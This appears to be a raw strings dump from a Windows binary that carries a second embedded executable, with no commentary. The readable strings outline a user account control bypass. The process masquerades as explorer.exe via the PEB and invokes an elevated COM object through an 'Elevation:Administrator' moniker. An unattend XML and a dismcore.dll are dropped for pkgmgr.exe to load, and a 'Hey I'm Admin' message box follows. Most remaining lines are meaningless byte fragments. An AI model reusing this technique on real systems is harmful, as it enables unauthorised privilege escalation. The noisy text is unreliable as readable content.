!This program cannot be run in DOS mode.
`.rdata
@.data
u*hh;@
VWh@"@
RtlGetCurrentPeb
RtlEnterCriticalSection
RtlLeaveCriticalSection
RtlInitUnicodeString
RtlFillMemory
NtAllocateVirtualMemory
LdrEnumerateLoadedModules
<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
<servicing>
<package action="install">
<assemblyIdentity name="Package_1_for_KB929761" version="6.0.1.1" language="neutral" processorArchitecture="x86" publicKeyToken="31bf3856ad364e35"/>
<source location="%configsetroot%\Windows6.0-KB929761-x86.CAB" />
</package>
</servicing>
</unattend>
.text$mn
.idata$5
.00cfg
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
SizeofResource
WriteFile
GetModuleFileNameW
GetTempPathW
WaitForSingleObject
CreateFileW
GetSystemDirectoryW
lstrcatW
LockResource
CloseHandle
LoadLibraryW
LoadResource
FindResourceW
GetWindowsDirectoryW
GetProcAddress
ExitProcess
KERNEL32.dll
MessageBoxW
USER32.dll
SHCreateItemFromParsingName
ShellExecuteExW
SHELL32.dll
CoInitialize
CoUninitialize
CoCreateInstance
CoGetObject
ole32.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
IsProcessorFeaturePresent
!This program cannot be run in DOS mode.
/Rich3
`.rdata
@.data
.reloc
.text$mn
.idata$5
.00cfg
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
GetStartupInfoW
ExpandEnvironmentStringsW
TerminateProcess
OpenProcess
CreateToolhelp32Snapshot
Process32NextW
Process32FirstW
CloseHandle
ExitProcess
CreateProcessW
lstrcmpW
KERNEL32.dll
RegQueryValueExW
RegOpenKeyExW
RegCloseKey
ADVAPI32.dll
PathFindFileNameW
SHLWAPI.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
IsProcessorFeaturePresent
1)1E1U1[1n1
2(212<2C2c2i2o2u2{2
3.373F3
X0`0d0,181
0#0-030C0c0j0r0y0
3 3%3/3>3M3\3k3v3|3
4!4&424<4G4M4T4[4b4i4o4v4}4
5K5R5a5
;6;_;w;
<1<L<W<d<
?1?I?Z?s?
0#0)0/0:0?0F0O0u0
1$1=1x1
192I2Q2
243b3x3
4 5(5}5
6G6O6U6
6=6R6f6~6
8$8]8t8
;,;3;z;
#0*070
1J2Q2^2e2
?*?>?I?P?]?
51686C6I6Y6h6n6s6
617:7D7a7
818W8g8l8r8w8~8
;$<+<Q<X<r<
<4=Q=n=
?*?G?q?
3a7i7n7u7
8 8$8+81888B8N8Y8
889?9I9P9Z9a9
<&=?=r=
)6n9u9
7)7J7b7u7}7
3;3D3[3a3
4 5*5?5P5V5
7"7(7.747:7@7G7T7Y7e7j7w7|7
9D9I9s9
:3:L:R:\:q:{:
<(<0<A<{<
?9?>?Z?`?t?}?
0 0%0*030;0@0I0O0\0f0s0x0
1=1Z1g1
2;2G2N2h2x2
3(3>3D3b3g3p3x3}3
3#4R4Y4}4
5/5D5M5S5Y5c5i5o5u5{5
6&6,616;6A6I6W6^6s6y6
6K7Q7\7
8$8/858;8A8I8O8U8[8c8{8
:#:P:h:
:1;D;O;Y;_;h;q;z;
< <$<)<6<?<M<V<k<x<
<2=8=C=z=
>7>=>E>M>]>c>i>
? ?&?O?
5#5<5Z5l5
7"7:7Q7m7
<!<F<_<v<
>5>L>k>}>
80K0g0
031C1Y1~1
3 343y3
4#4<4N4a4x4
7.7E7_7r7
7$8=8J8
=4=9=C=M=R=\={=
>4>d>n>s>}>
>,?<?I?N?Y?d?i?t?
0 0$010<0A0L0W0\0g0r0w0
2+2D2X2a2j2
7"8D8h8x8
989P9a9
:1:G:]:s:
:];f;k;
<Q=a=w=
161I1k1l2
4-4F4_4d4q4
575I5[5o5
6 6H6`6
7,9H9c9
;!;[;b;p;
0!1(1f1~1
5(585E5\5
7L8Y8f8k8{8
9+9;9W9
;*;8;^;
2&2<2J2g2
2-3D3d3
6"7,7A7
7)878H8r8
:!:':.:4:::@:F:g:l:q:w:}:
;/;=;G;L;^;d;o;
<&<@<^<x<
<'=E=j=u=
>">'>F>p>w>
? ?B?S?b?x?
4)4T4|4
5*5B5N5X5f5w5
5/666L6\6}6
9O:r:x:
:(;5;B;O;\;i;
010T0]0r0
3@3F3T3_3v3
9&9:9S9l9
:!:*:3:@:M:h:{:
; ;.;9;Q;V;
< =1=n=
>'?m?v?
0-0^0d0w0~0
4 4&464N4\4s4
5)5C5j5
919A9J9Q9
;L;\;e;l;
202W2e2
< <3<8<@<G<
<)=X=|=
> >2>X>h>q>
4%4N4c4i4y4
7b8x8?9L9i9n9u9
:N:c:}:
;);=;j;u;
=%=,=c=n={=
>.>J>Q>^>w>
191P1W1
223I3b3n3
5A5N5u5
6 6_6f6
72:(?1?7?X?
020;0A0b0
2 2H2Q2W2z2
323A3L4z4
4#5,525\5
0#0*0:0f0m0}0
0E1L1Y1
2?3D3J3[3|3
3M4R4`4p4
5(6-6:6
7!7&7+70757:7?7D7I7N7S7X7]7b7g7
868U8t8
9$93999H9c9m9|9
:#:>:H:S:Y:e:
?;???E?O?Y?c?m?w?
5$5(5,5054585<5@5D5
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
T2X2\2
2094989<9@9D9H9L9P9
0 0$0(0,0004080`1d1h5
ntdll.dll
Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
explorer.exe
\explorer.exe
WM_DISP
dismcore.dll
ellocnak.xml
\pkgmgr.exe
/n:%temp%\ellocnak.xml
Hey I'm Admin
WM_DISP
SOFTWARE\_rptls
Install
%systemroot%\system32\